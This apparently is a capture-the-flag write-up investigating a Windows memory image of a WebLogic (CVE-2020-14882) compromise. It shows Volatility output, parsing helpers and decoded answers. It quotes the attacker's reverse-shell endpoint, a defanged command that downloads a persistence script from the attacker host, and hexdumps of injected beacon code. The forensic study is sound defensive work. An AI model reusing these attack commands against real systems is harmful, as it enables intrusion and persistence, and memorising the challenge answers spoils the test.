0xb68cb2cffb20	TCPv6	c0a8:9083::c8e0:70b2:8cb6:ffff	5556	::	0	LISTENING	4456	java.exe	2021-08-06 15:30:03.000000 
0xb68cb2cffc70	TCPv6	7f00:1::98b0:6cb1:8cb6:ffff	1527	::	0	LISTENING	4772	java.exe	2021-08-06 15:30:07.000000 
0xb68cb2e135c0	TCPv4	127.0.0.1	49686	127.0.0.1	49687	ESTABLISHED	4752	java.exe	2021-08-06 15:30:39.000000 
0xb68cb2e57ec0	TCPv6	c0a8:9083::c8e0:70b2:8cb6:ffff	7001	::	0	LISTENING	4752	java.exe	2021-08-06 15:31:00.000000 

Ans: 4752
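Counting ESTABLISHED rows, spotting the 80 and 7001 listeners, and reading off the PID behind port 7001 are all the same kind of filtering over the NetScan table. As an added example (not code from the original post or from Volatility), here is a small Python parser for the plugin's tab-separated output that does those three things over an excerpt of the rows shown above and also lists the sockets talking to other hosts, where the powershell.exe and the PID 1488 svchost.exe connections stand out.

```python
"""Triage helpers for Volatility 3 windows.netscan.NetScan output.
Added example for this writeup; not code from the original post or
from Volatility. The rows below are an excerpt of the NetScan output
shown above; a real run would read the complete plugin output."""
from collections import defaultdict

# Excerpt of the page's NetScan output, banner lines included so the
# parser has to skip them. Column layout is Volatility 3 2.4.1's.
NETSCAN_EXCERPT = """\
Volatility 3 Framework 2.4.1
Progress:  100.00\t\tPDB scanning finished
Offset\tProto\tLocalAddr\tLocalPort\tForeignAddr\tForeignPort\tState\tPID\tOwner\tCreated

0xb68cb0751010\tTCPv4\t192.168.144.131\t80\t0.0.0.0\t0\tLISTENING\t508\tsvchost.exe\t2021-08-06 15:26:45.000000
0xb68cb1f6e740\tTCPv4\t127.0.0.1\t49676\t127.0.0.1\t49675\tESTABLISHED\t4752\tjava.exe\t2021-08-06 15:30:28.000000
0xb68cb2c58a50\tTCPv6\t7f00:1::98b0:6cb1:8cb6:ffff\t7001\t::\t0\tLISTENING\t4752\tjava.exe\t2021-08-06 15:31:00.000000
0xb68cb2cffb20\tTCPv6\tc0a8:9083::c8e0:70b2:8cb6:ffff\t5556\t::\t0\tLISTENING\t4456\tjava.exe\t2021-08-06 15:30:03.000000
0xb68cb2f2eb70\tTCPv4\t192.168.144.131\t49674\t51.103.5.186\t443\tESTABLISHED\t2676\texplorer.exe\t2021-08-06 15:29:22.000000
0xb68cb3237830\tTCPv4\t192.168.144.131\t49869\t192.168.144.129\t1339\tCLOSE_WAIT\t4344\tpowershell.exe\t2021-08-06 15:51:40.000000
0xb68cb346d370\tTCPv4\t192.168.144.131\t49903\t192.168.144.129\t1337\tCLOSED\t1488\tsvchost.exe\t2021-08-06 16:17:52.000000
0xb68cb3236b90\tUDPv4\t0.0.0.0\t0\t*\t0\t\t4344\tpowershell.exe\t2021-08-06 15:54:58.000000
"""

COLUMNS = ["Offset", "Proto", "LocalAddr", "LocalPort", "ForeignAddr",
           "ForeignPort", "State", "PID", "Owner", "Created"]


def parse_netscan(text):
    """Return one dict per socket row, skipping banner, progress, header
    and blank lines. UDP rows carry an empty State column, so rows are
    split on single tabs and never on runs of whitespace."""
    rows = []
    for line in text.splitlines():
        fields = line.rstrip(" ").split("\t")
        if len(fields) != len(COLUMNS) or fields[0] == "Offset":
            continue
        row = dict(zip(COLUMNS, fields))
        for key in ("LocalPort", "ForeignPort", "PID"):
            row[key] = int(row[key])
        rows.append(row)
    return rows


def count_established(rows):
    """Raw count of ESTABLISHED rows, the way the challenge counts them
    (sockets the scanner reports twice are not de-duplicated)."""
    return sum(1 for r in rows if r["State"] == "ESTABLISHED")


def listeners(rows):
    """Map each listening TCP port to the set of (PID, Owner) behind it."""
    out = defaultdict(set)
    for r in rows:
        if r["State"] == "LISTENING":
            out[r["LocalPort"]].add((r["PID"], r["Owner"]))
    return dict(out)


def pids_on_port(rows, port):
    """PIDs listening on `port` (7001 gives the WebLogic java.exe)."""
    return sorted({pid for pid, _ in listeners(rows).get(port, ())})


# Far ends that mean "no peer": wildcard, unbound and loopback.
LOCAL_PEERS = {"0.0.0.0", "::", "*", "127.0.0.1", "::1"}


def remote_peers(rows):
    """TCP rows whose far end is another host, keyed by (PID, Owner).
    A shell or a non-system binary talking to a peer is the first thing
    to review; closed sockets still carry the peer and the timestamp."""
    out = defaultdict(list)
    for r in rows:
        if r["Proto"].startswith("TCP") and r["ForeignAddr"] not in LOCAL_PEERS:
            out[(r["PID"], r["Owner"])].append(
                (r["ForeignAddr"], r["ForeignPort"], r["State"]))
    return dict(out)


if __name__ == "__main__":
    rows = parse_netscan(NETSCAN_EXCERPT)
    print("established rows:", count_established(rows))
    for port, owners in sorted(listeners(rows).items()):
        print(f"listening {port}: {sorted(owners)}")
    for key, peers in remote_peers(rows).items():
        print(key, peers)
```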

what is the PID of the next entry to the previous process? (Hint: ActiveProcessLinks list)

The hint points to pslist, so check pslist.

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.pslist.PsList
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
PID	PPID	ImageFileName	Offset(V)	Threads	Handles	SessionId	Wow64	CreateTime	ExitTime	File output

...(omitted)

2196	508	sihost.exe	0xb68cb2b79080	8	-	1	False	2021-08-06 15:29:13.000000 	N/A	Disabled
2756	652	svchost.exe	0xb68cb28f2480	6	-	1	False	2021-08-06 15:29:13.000000 	N/A	Disabled
2424	508	taskhostw.exe	0xb68cb2d34800	13	-	1	False	2021-08-06 15:29:13.000000 	N/A	Disabled
1140	560	userinit.exe	0xb68cb2b73280	0	-	1	False	2021-08-06 15:29:16.000000 	2021-08-06 15:29:40.000000 	Disabled
2676	1140	explorer.exe	0xb68cb2d36800	50	-	1	False	2021-08-06 15:29:16.000000 	N/A	Disabled
3496	764	ShellExperienc	0xb68cb2d30800	33	-	1	False	2021-08-06 15:29:21.000000 	N/A	Disabled
3408	764	SearchUI.exe	0xb68cb2d2e800	43	-	1	False	2021-08-06 15:29:21.000000 	N/A	Disabled
2552	3488	ServerManager.	0xb68cb2f17800	12	-	1	False	2021-08-06 15:29:22.000000 	N/A	Disabled
3732	2676	vmtoolsd.exe	0xb68cb2b6d800	8	-	1	False	2021-08-06 15:29:32.000000 	N/A	Disabled
4172	4132	jusched.exe	0xb68cb3039800	1	-	1	True	2021-08-06 15:29:34.000000 	N/A	Disabled
4356	2676	cmd.exe	0xb68cb317d340	1	-	1	False	2021-08-06 15:29:59.000000 	N/A	Disabled
4364	4356	conhost.exe	0xb68cb277f800	3	-	1	False	2021-08-06 15:29:59.000000 	N/A	Disabled
4456	4356	java.exe	0xb68cb2f21800	16	-	1	False	2021-08-06 15:30:00.000000 	N/A	Disabled
4556	2676	cmd.exe	0xb68cb2cfb600	1	-	1	False	2021-08-06 15:30:04.000000 	N/A	Disabled
4564	4556	conhost.exe	0xb68cb2a1f480	3	-	1	False	2021-08-06 15:30:04.000000 	N/A	Disabled
4736	4556	cmd.exe	0xb68cb2333080	1	-	1	False	2021-08-06 15:30:05.000000 	N/A	Disabled
4752	4556	java.exe	0xb68cb23e4080	44	-	1	False	2021-08-06 15:30:05.000000 	N/A	Disabled
4772	4736	java.exe	0xb68cb2344080	18	-	1	False	2021-08-06 15:30:05.000000 	N/A	Disabled
1392	4172	jucheck.exe	0xb68cb3476080	4	-	1	True	2021-08-06 15:34:34.000000 	N/A	Disabled
2824	560	fontdrvhost.ex	0xb68cb1ff3080	5	-	1	False	2021-08-06 15:35:54.000000 	N/A	Disabled
840	652	armsvc.exe	0xb68cb2451380	2	-	0	True	2021-08-06 15:41:38.000000 	N/A	Disabled
4344	4752	powershell.exe	0xb68cb32c6800	15	-	1	False	2021-08-06 15:51:40.000000 	N/A	Disabled
4636	4344	conhost.exe	0xb68cb2444680	1	-	1	False	2021-08-06 15:51:40.000000 	N/A	Disabled
4200	4752	powershell.exe	0xb68cb356f080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
2712	4752	powershell.exe	0xb68cb322f800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:45.000000 	Disabled
2132	4752	powershell.exe	0xb68cb33c9080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
4264	4752	powershell.exe	0xb68cb22fe080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
3684	4752	powershell.exe	0xb68cb2df3080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
3676	4752	powershell.exe	0xb68cb1f64080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:45.000000 	Disabled
3520	4752	powershell.exe	0xb68cb3045080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
1012	4752	powershell.exe	0xb68cb32fa800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
2200	4752	powershell.exe	0xb68cb34b6800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:45.000000 	Disabled
776	4752	powershell.exe	0xb68cb34c2800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
1616	4752	powershell.exe	0xb68cb34ca800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
2688	2676	mmc.exe	0xb68cb382a5c0	14	-	1	False	2021-08-06 15:56:56.000000 	N/A	Disabled
1488	4344	svchost.exe	0xb68cb24b5080	7	-	1	False	2021-08-06 16:06:50.000000 	N/A	Disabled
4596	800	notepad.exe	0xb68cb3309080	3	-	1	False	2021-08-06 16:12:52.000000 	N/A	Disabled
2568	2676	RamCapture64.e	0xb68cb3256580	4	-	1	False	2021-08-06 16:13:20.000000 	N/A	Disabled
3524	2568	conhost.exe	0xb68cb3871800	3	-	1	False	2021-08-06 16:13:20.000000 	N/A	Disabled

Pick 4772, the entry right after 4752.

Ans: 4772

How many threads does the process responsible for the initial exploit have?

The Threads column is in the windows.pslist.Pslist output seen above.
It can also be checked with windows.psscan.Psscan.

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.psscan.PsScan --pid 4752
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
PID	PPID	ImageFileName	Offset(V)	Threads	Handles	SessionId	Wow64	CreateTime	ExitTime	File output

4752	4556	java.exe	0xb68cb23e4080	44	-	1	False	2021-08-06 15:30:05.000000 	N/A	Disabled

Ans: 44
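The next-entry and thread-count questions, and the parent/child lineage that the process tree shows, can all be read off the PsList table programmatically. Added example (not code from the original post or from Volatility) that parses the output, assuming the one constructed services.exe row noted in the comments, and flags the two lineage anomalies in this image: svchost.exe not started by services.exe (PID 1488) and powershell.exe spawned by the WebLogic java.exe.

```python
"""Process-list triage over Volatility 3 windows.pslist.PsList output.
Added example for this writeup; not code from the original post or from
Volatility. Rows are an excerpt of the PsList output shown above, plus
one constructed row for services.exe (its real row sits in the omitted
part of the listing)."""

PSLIST_COLUMNS = ["PID", "PPID", "ImageFileName", "Offset(V)", "Threads",
                  "Handles", "SessionId", "Wow64", "CreateTime", "ExitTime",
                  "File output"]

# The 652/services.exe row is constructed (placeholder offset, threads and
# times); every other row is copied from the page's PsList output.
PSLIST_EXCERPT = """\
Volatility 3 Framework 2.4.1
Progress:  100.00\t\tPDB scanning finished
PID\tPPID\tImageFileName\tOffset(V)\tThreads\tHandles\tSessionId\tWow64\tCreateTime\tExitTime\tFile output

652\t568\tservices.exe\t0x0\t0\t-\t0\tFalse\tN/A\tN/A\tDisabled
2756\t652\tsvchost.exe\t0xb68cb28f2480\t6\t-\t1\tFalse\t2021-08-06 15:29:13.000000\tN/A\tDisabled
2676\t1140\texplorer.exe\t0xb68cb2d36800\t50\t-\t1\tFalse\t2021-08-06 15:29:16.000000\tN/A\tDisabled
4556\t2676\tcmd.exe\t0xb68cb2cfb600\t1\t-\t1\tFalse\t2021-08-06 15:30:04.000000\tN/A\tDisabled
4752\t4556\tjava.exe\t0xb68cb23e4080\t44\t-\t1\tFalse\t2021-08-06 15:30:05.000000\tN/A\tDisabled
4772\t4736\tjava.exe\t0xb68cb2344080\t18\t-\t1\tFalse\t2021-08-06 15:30:05.000000\tN/A\tDisabled
4344\t4752\tpowershell.exe\t0xb68cb32c6800\t15\t-\t1\tFalse\t2021-08-06 15:51:40.000000\tN/A\tDisabled
4200\t4752\tpowershell.exe\t0xb68cb356f080\t0\t-\t1\tFalse\t2021-08-06 15:51:40.000000\t2021-08-06 15:51:44.000000\tDisabled
1488\t4344\tsvchost.exe\t0xb68cb24b5080\t7\t-\t1\tFalse\t2021-08-06 16:06:50.000000\tN/A\tDisabled
2568\t2676\tRamCapture64.e\t0xb68cb3256580\t4\t-\t1\tFalse\t2021-08-06 16:13:20.000000\tN/A\tDisabled
"""


def parse_pslist(text):
    """One dict per process row, in the order the plugin printed them.
    Banner, progress, header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        fields = [f.strip() for f in line.split("\t")]
        if len(fields) != len(PSLIST_COLUMNS) or fields[0] == "PID":
            continue
        row = dict(zip(PSLIST_COLUMNS, fields))
        for key in ("PID", "PPID", "Threads"):
            row[key] = int(row[key])
        rows.append(row)
    return rows


def next_in_list(rows, pid):
    """PID of the entry printed after `pid`. PsList walks the kernel's
    ActiveProcessLinks list, so printed order is list order (PsScan,
    which finds EPROCESS blocks by pool tag, gives no such guarantee)."""
    pids = [r["PID"] for r in rows]
    i = pids.index(pid)
    return pids[i + 1] if i + 1 < len(pids) else None


def threads_of(rows, pid):
    return next(r["Threads"] for r in rows if r["PID"] == pid)


def children(rows, pid):
    """PIDs whose parent is `pid`, what PsTree prints one level below it."""
    return [r["PID"] for r in rows if r["PPID"] == pid]


SHELLS = {"powershell.exe", "cmd.exe"}
# Server images that should never spawn a shell; java.exe hosts WebLogic here.
SERVER_IMAGES = {"java.exe"}


def flag_lineage(rows):
    """(PID, reason) for rows that break expected Windows lineage:
    svchost.exe whose parent is not services.exe, and a shell whose
    parent is a server process. Both patterns occur in this image."""
    by_pid = {r["PID"]: r for r in rows}
    findings = []
    for r in rows:
        parent = by_pid.get(r["PPID"])
        parent_name = parent["ImageFileName"].lower() if parent else "<not in list>"
        image = r["ImageFileName"].lower()
        if image == "svchost.exe" and parent_name != "services.exe":
            findings.append((r["PID"], f"svchost.exe started by {parent_name}"))
        if image in SHELLS and parent_name in SERVER_IMAGES:
            findings.append((r["PID"], f"{image} spawned by {parent_name}"))
    return findings


if __name__ == "__main__":
    rows = parse_pslist(PSLIST_EXCERPT)
    print("next after 4752:", next_in_list(rows, 4752))
    print("threads of 4752:", threads_of(rows, 4752))
    print("children of 4752:", children(rows, 4752))
    for pid, reason in flag_lineage(rows):
        print(f"PID {pid}: {reason}")
```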

The attacker gain access to the system through the webserver. What is the CVE number of the vulnerability exploited?

Use the windows.pstree.Pstree command to check the processes that have PID 4752 as their parent.

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.pstree.PsTree
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
PID	PPID	ImageFileName	Offset(V)	Threads	Handles	SessionId	Wow64	CreateTime	ExitTime

4	0	System	0xb68cb04ac040	113	-	N/A	False	2021-08-06 15:26:02.000000 	N/A
* 292	4	smss.exe	0xb68cb168f800	2	-	N/A	False	2021-08-06 15:26:02.000000 	N/A
** 504	292	smss.exe	0xb68cb1ccf080	0	-	1	False	2021-08-06 15:26:11.000000 	2021-08-06 15:26:11.000000 
*** 512	504	csrss.exe	0xb68cb17d9540	12	-	1	False	2021-08-06 15:26:11.000000 	N/A
*** 560	504	winlogon.exe	0xb68cb1ea5080	2	-	1	False	2021-08-06 15:26:11.000000 	N/A
**** 912	560	dwm.exe	0xb68cb1ff5080	15	-	1	False	2021-08-06 15:26:18.000000 	N/A
**** 2824	560	fontdrvhost.ex	0xb68cb1ff3080	5	-	1	False	2021-08-06 15:35:54.000000 	N/A
**** 1140	560	userinit.exe	0xb68cb2b73280	0	-	1	False	2021-08-06 15:29:16.000000 	2021-08-06 15:29:40.000000 
***** 2676	1140	explorer.exe	0xb68cb2d36800	50	-	1	False	2021-08-06 15:29:16.000000 	N/A
****** 2688	2676	mmc.exe	0xb68cb382a5c0	14	-	1	False	2021-08-06 15:56:56.000000 	N/A
****** 4356	2676	cmd.exe	0xb68cb317d340	1	-	1	False	2021-08-06 15:29:59.000000 	N/A
******* 4456	4356	java.exe	0xb68cb2f21800	16	-	1	False	2021-08-06 15:30:00.000000 	N/A
******* 4364	4356	conhost.exe	0xb68cb277f800	3	-	1	False	2021-08-06 15:29:59.000000 	N/A
****** 2568	2676	RamCapture64.e	0xb68cb3256580	4	-	1	False	2021-08-06 16:13:20.000000 	N/A
******* 3524	2568	conhost.exe	0xb68cb3871800	3	-	1	False	2021-08-06 16:13:20.000000 	N/A
****** 4556	2676	cmd.exe	0xb68cb2cfb600	1	-	1	False	2021-08-06 15:30:04.000000 	N/A
******* 4736	4556	cmd.exe	0xb68cb2333080	1	-	1	False	2021-08-06 15:30:05.000000 	N/A
******** 4772	4736	java.exe	0xb68cb2344080	18	-	1	False	2021-08-06 15:30:05.000000 	N/A
******* 4564	4556	conhost.exe	0xb68cb2a1f480	3	-	1	False	2021-08-06 15:30:04.000000 	N/A
******* 4752	4556	java.exe	0xb68cb23e4080	44	-	1	False	2021-08-06 15:30:05.000000 	N/A
******** 3520	4752	powershell.exe	0xb68cb3045080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 3684	4752	powershell.exe	0xb68cb2df3080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 4200	4752	powershell.exe	0xb68cb356f080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 4264	4752	powershell.exe	0xb68cb22fe080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 776	4752	powershell.exe	0xb68cb34c2800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 2712	4752	powershell.exe	0xb68cb322f800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:45.000000 
******** 1616	4752	powershell.exe	0xb68cb34ca800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 2132	4752	powershell.exe	0xb68cb33c9080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 1012	4752	powershell.exe	0xb68cb32fa800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 4344	4752	powershell.exe	0xb68cb32c6800	15	-	1	False	2021-08-06 15:51:40.000000 	N/A
********* 1488	4344	svchost.exe	0xb68cb24b5080	7	-	1	False	2021-08-06 16:06:50.000000 	N/A
********* 4636	4344	conhost.exe	0xb68cb2444680	1	-	1	False	2021-08-06 15:51:40.000000 	N/A
******** 3676	4752	powershell.exe	0xb68cb1f64080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:45.000000 
******** 2200	4752	powershell.exe	0xb68cb34b6800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:45.000000 
****** 3732	2676	vmtoolsd.exe	0xb68cb2b6d800	8	-	1	False	2021-08-06 15:29:32.000000 	N/A
2552	3488	ServerManager.	0xb68cb2f17800	12	-	1	False	2021-08-06 15:29:22.000000 	N/A
4172	4132	jusched.exe	0xb68cb3039800	1	-	1	True	2021-08-06 15:29:34.000000 	N/A
* 1392	4172	jucheck.exe	0xb68cb3476080	4	-	1	True	2021-08-06 15:34:34.000000 	N/A
4596	800	notepad.exe	0xb68cb3309080	3	-	1	False	2021-08-06 16:12:52.000000 	N/A
remnux@remnux:~/Downloads$ 

You can see that the exploitation was carried out almost entirely through PowerShell.
As the windows.cmdline.CmdLine output checked earlier also showed, PID 4344 is executing a Base64-obfuscated payload.
Searching for something like "Powershell Weblogic RCE" turns up the following site.

I suppose CVE-2020-14882 is the answer.

Ans: CVE-2020-14882

The attacker used the vulnerability he found in the webserver to execute a reverse shell command to his own server. Provide the IP and port of the attacker's server. Format: IP:port

Decode the Base64-obfuscated exploit from the cmdline output. I decoded it on the following site.

image.png
Decoding done! Time to answer.

Ans: 192.168.144.129:1339
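The decoding step above can also be done offline instead of on a website. The following Python is an added example, not code from the original writeup or from Volatility: it pulls the Base64 argument out of a PowerShell command line (as shown by windows.cmdline.CmdLine), decodes it the way -EncodedCommand is defined (Base64 of the UTF-16LE script, re-padding it if the captured command line lost its trailing `=`), and lists the IPv4:port pairs found in the decoded text. The command line and script it works on are constructed for the example; the real payload is the one in the memory image.

```python
import base64
import re

# Constructed sample (not the real payload): a PowerShell command line of the
# shape the writeup examines, built from a harmless script so the example is
# self-contained and the decoder's output can be checked.
SAMPLE_SCRIPT = '$endpoint = ("192.168.144.129",1339); Write-Output "constructed sample"'
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)

# Common spellings of the flag; PowerShell accepts any unambiguous prefix of
# -EncodedCommand, so extend this list if a sample uses another one.
FLAG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Matches "1.2.3.4:80", "1.2.3.4",80 and '1.2.3.4', 80 forms.
ENDPOINT_RE = re.compile(r'(\d{1,3}(?:\.\d{1,3}){3})["\']?\s*[:,]\s*["\']?(\d{1,5})')


def extract_encoded(cmdline):
    """Return the Base64 blob following an -EncodedCommand style flag, or None."""
    m = FLAG_RE.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(b64):
    """Decode an -EncodedCommand payload: Base64 of the UTF-16LE script text.

    Command lines captured from memory are sometimes cut at the padding, so
    missing '=' characters are restored before decoding.
    """
    padded = b64 + "=" * (-len(b64) % 4)
    raw = base64.b64decode(padded)
    if len(raw) % 2:
        raise ValueError("odd byte count: not a complete UTF-16LE payload")
    return raw.decode("utf-16-le")


def find_endpoints(script):
    """Sorted, de-duplicated 'ip:port' strings mentioned in the decoded script."""
    return sorted({f"{ip}:{port}" for ip, port in ENDPOINT_RE.findall(script)})


def analyze(cmdline):
    """Decode a command line and report the script and the endpoints it names."""
    b64 = extract_encoded(cmdline)
    if b64 is None:
        return None
    script = decode_encoded_command(b64)
    return {"script": script, "endpoints": find_endpoints(script)}


if __name__ == "__main__":
    result = analyze(SAMPLE_CMDLINE)
    print(result["script"])
    print("endpoints:", ", ".join(result["endpoints"]))
```

To use it on the real sample, paste the powershell.exe command line from the CmdLine output into `analyze()`; the endpoint list is what the question asks for, and the decoded script is worth keeping as an artifact of its own.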

Multiple files were downloaded from the attacker's web server. Provide the command used to download the PowerShell script used for persistence.

Look at the PowerShell that runs after the obfuscated payload in PID 4344.
Since the malware appears to be unpacked in memory, take a memory dump. vol3's memmap command would also work, but this time I wanted to dump every powershell.exe at once, so I used Volatility 2.

remnux@remnux:~/Downloads$ vol.py -f memory.mem --profile=Win2016x64_14393 memdump -n powershell.exe -D out
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends.openssl import backend
************************************************************************
Writing powershell.exe [  4344] to 4344.dmp
************************************************************************
Writing powershell.exe [  4200] to 4200.dmp
************************************************************************
Writing powershell.exe [  2712] to 2712.dmp
************************************************************************
Writing powershell.exe [  2132] to 2132.dmp
************************************************************************
Writing powershell.exe [  4264] to 4264.dmp
************************************************************************
Writing powershell.exe [  3684] to 3684.dmp
************************************************************************
Writing powershell.exe [  3676] to 3676.dmp
************************************************************************
Writing powershell.exe [  3520] to 3520.dmp
************************************************************************
Writing powershell.exe [  1012] to 1012.dmp
************************************************************************
Writing powershell.exe [  2200] to 2200.dmp
************************************************************************
Writing powershell.exe [   776] to 776.dmp
************************************************************************
Writing powershell.exe [  1616] to 1616.dmp
remnux@remnux:~/Downloads$ 

All of the memory dumps landed in the out directory in one go.

remnux@remnux:~/Downloads/out$ ls -lta
total 7077676
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 1616.dmp
drwxrwxr-x 2 remnux remnux      4096 Jun 12 10:19 .
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 776.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 2200.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 1012.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 3520.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 3676.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 3684.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 4264.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:18 2132.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:18 2712.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:18 4200.dmp
-rw-rw-r-- 1 remnux remnux 679759872 Jun 12 10:18 4344.dmp
drwxr-xr-x 3 remnux remnux      4096 Jun 12 10:17 ..

Check the contents of these dumps one by one with strings. I figured the answer would most likely be the C2 address, so I grep for it as well.

remnux@remnux:~/Downloads/out$ strings -e l 4344.dmp | grep http://192.168.144.129

18.png
From this, answer with the command whose length matches the expected answer.
※ The answer below is defanged.

Ans: Invoke-WebRequest -Uri "http[:]//192.168.144.129:1338/presist.ps1" -OutFile "./presist.ps1"

What is the MITRE ID related to the persistence technique the attacker used?

In the cmdline output, look at the PID 2688 command that runs after the PowerShell exploit chain ends, and you can guess the answer.

2688	mmc.exe	"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s

It is taskschd, so persistence was set up through the Task Scheduler. All that remains is to look it up in MITRE ATT&CK.

Ans: T1053.005

After maintaining persistence, the attacker dropped a Cobalt Strike beacon. Try to analyze it and provide the Publickey_MD5.

Checking PID 1488 in the command lines after PID 2688 makes it clear: an svchost.exe sitting on the Desktop is odd, so judge it to be disguised malware (the Cobalt Strike beacon).
For good measure, confirm this with the windows.malfind.Malfind command as well.

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.malfind.Malfind
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
PID	Process	Start VPN	End VPN	Tag	Protection	CommitCharge	PrivateMemory	File output	Hexdump	Disasm

1876	MsMpEng.exe	0x202d43d0000	0x202d43d0fff	VadS	PAGE_EXECUTE_READWRITE	1	1	Disabled	
55 48 8d 2c 24 48 83 ec	UH.,$H..
20 48 8b 01 48 8b 49 08	.H..H.I.
ff d0 48 8d 65 00 5d c3	..H.e.].
cc cc cc cc cc cc cc cc	........
cc cc cc cc cc cc cc cc	........
cc cc cc cc cc cc cc cc	........
cc cc cc cc cc cc cc cc	........
cc cc cc cc cc cc cc cc	........	
0x202d43d0000:	push	rbp
0x202d43d0001:	lea	rbp, [rsp]
0x202d43d0005:	sub	rsp, 0x20
0x202d43d0009:	mov	rax, qword ptr [rcx]
0x202d43d000c:	mov	rcx, qword ptr [rcx + 8]
0x202d43d0010:	call	rax
0x202d43d0012:	lea	rsp, [rbp]
0x202d43d0016:	pop	rbp
0x202d43d0017:	ret	
0x202d43d0018:	int3	
0x202d43d0019:	int3	
0x202d43d001a:	int3	

...(omitted)

2688	mmc.exe	0x7ff7e2310000	0x7ff7e231ffff	VadS	PAGE_EXECUTE_READWRITE	1	1	Disabled	
00 00 00 00 00 00 00 00	........
78 0d 00 00 00 00 00 00	x.......
45 00 00 00 49 c7 c2 00	E...I...
00 00 00 48 b8 c0 48 ad	...H..H.
d1 fc 7f 00 00 ff e0 49	.......I
c7 c2 01 00 00 00 48 b8	......H.
c0 48 ad d1 fc 7f 00 00	.H......
ff e0 49 c7 c2 02 00 00	..I.....	
0x7ff7e2310000:	add	byte ptr [rax], al
0x7ff7e2310002:	add	byte ptr [rax], al
0x7ff7e2310004:	add	byte ptr [rax], al
0x7ff7e2310006:	add	byte ptr [rax], al
0x7ff7e2310008:	js	0x7ff7e2310017
0x7ff7e231000a:	add	byte ptr [rax], al
0x7ff7e231000c:	add	byte ptr [rax], al
0x7ff7e231000e:	add	byte ptr [rax], al
0x7ff7e2310010:	add	byte ptr [r8], r8b
0x7ff7e2310013:	add	byte ptr [rcx - 0x39], cl
0x7ff7e2310016:	ret	0
0x7ff7e2310019:	add	byte ptr [rax], al
0x7ff7e231001b:	movabs	rax, 0x7ffcd1ad48c0
0x7ff7e2310025:	jmp	rax
0x7ff7e2310027:	mov	r10, 1
0x7ff7e231002e:	movabs	rax, 0x7ffcd1ad48c0
0x7ff7e2310038:	jmp	rax
1488	svchost.exe	0xb30000	0xb7bfff	VadS	PAGE_EXECUTE_READWRITE	76	1	Disabled	
4d 5a 41 52 55 48 89 e5	MZARUH..
48 81 ec 20 00 00 00 48	H......H
8d 1d ea ff ff ff 48 89	......H.
df 48 81 c3 f4 63 01 00	.H...c..
ff d3 41 b8 f0 b5 a2 56	..A....V
68 04 00 00 00 5a 48 89	h....ZH.
f9 ff d0 00 00 00 00 00	........
00 00 00 00 f8 00 00 00	........	
0xb30000:	pop	r10
0xb30002:	push	r10
0xb30004:	push	rbp
0xb30005:	mov	rbp, rsp
0xb30008:	sub	rsp, 0x20
0xb3000f:	lea	rbx, [rip - 0x16]
0xb30016:	mov	rdi, rbx
0xb30019:	add	rbx, 0x163f4
0xb30020:	call	rbx
